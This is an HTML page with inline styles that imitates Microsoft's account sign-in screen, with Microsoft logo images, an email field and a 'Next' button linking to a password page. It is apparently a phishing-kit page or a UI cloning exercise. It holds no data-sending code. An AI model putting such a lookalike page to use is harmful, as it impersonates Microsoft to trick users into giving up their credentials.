<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to your Microsoft account</title>
    <link rel="icon" type="image/x-icon" href="image/favicon.png">
    <style>
        body{
            background-image: url('image/microsoftbg.png');
            background-repeat: no-repeat;
            background-size: cover;
        }
        #div1{
            margin-left: 400px;
            margin-top: 80px;
            width: 460px;
            background-color: #ffffff;
            padding-left: 50px;
            padding-top: 30px;
            padding-bottom: 60px;
        }
        #img1{
            width: 120px;
        }
        #p1{
	    font-family: Arial;
            font-size: 25px;
            margin-top: -5px;
        }
        #textbox{
            border: none;
            outline: none;
            font-size: 14px;
        }
        hr{
            width: 400px;
            margin-right: 100px;
            margin-bottom: 17px;
        }
        #label1{
            color: #1b1b1b;
            font-size: 17px;
        }
        #a1{
            color: #108df3;
            text-decoration: none;
            font-size: 17px;
        }
        #a1:hover{
            text-decoration: underline;
            color: #666666;

        }
        #a2{
            font-size: 17px;
            text-decoration: none;
            color: #108df3;
            float: left;
            margin-right: 0px;
        }
        #a2:hover{
            text-decoration: underline;
            color: #666666;
        }
        #a3{
            float: left;
            margin-left: -10px;
        }
        #img2{
            width: 40px;
            
        }

        #submit1:hover{
            cursor: pointer;
            opacity: 1;
        }

        #submit{
            width: 110px;
            background-color: #005da6;
            color: white;
            font-size: 14px;
            padding: 7px;
            border: 1px solid #005da6;
            margin-left: 296px;
            margin-top: 5px;
            opacity: 0.9;
        }
        #submit:hover{
            cursor: pointer;
            opacity: 1;
        }
        #div2{
            margin-left: 450px;
            height: 60px;
            margin-top: 22px;
        }
        #img3{
            width: 55px;
            float: left;
            margin-left: 50px;
        }
        #label2{
            font-size: 14px;
            float: left;
            margin-top: 19px;
        }
        #button1{
            background-color: #ffffff;
            border: 1px solid #ffffff;
            width: 510px;
	    margin-left: -50px;
        }
        #button1:hover{
            cursor: pointer;
            background-color: #e5e5e5;
            border: 1px solid #e5e5e5;
        }
        #div3{
            margin-top: 70px;
            margin-left: 1000px;
	    font-size: 12px;
        }
        #a4{
            color: black;
            text-decoration: none;
        }
        #a4:hover{
            text-decoration: underline;
        }
        #a5{
            color: black;
            margin-left: 20px;
            text-decoration: none;
        }
        #a5:hover{
            text-decoration: underline;
        }

    </style>
</head>
<body>
    <div id="div1">
        <img id="img1" src="image/microsoftlogo.png" alt="">
        <p id="p1">Sign in</p>
        <input id="textbox" type="email" name="email" placeholder="Email, phone, or Skype" required />
        <hr>
        <label id="label1" for="">No account?</label>
        <a id="a1" href="#">Create one!</a><br><br>
        <a id="a2" href="#">Can't access your account</a>
        <a id="a3" href="#"><img id="img2" src="image/q4.png" alt=""></a><br><br>

        <a href="password.html"><input id="submit" type="submit" name="submit" value="Next"></a>

    </div>

    <div id="div2">
        <button id="button1">
            <img id="img3" src="image/key.png" alt="">
            <label id="label2" for="">Sign-in options</label>
        </button>

    </div>

    <div id="div3">
        <a id="a4" href="#">Terms of use</a>
        <a id="a5" href="#">Privacy & cookies</a>

    </div>
</body>
</html>


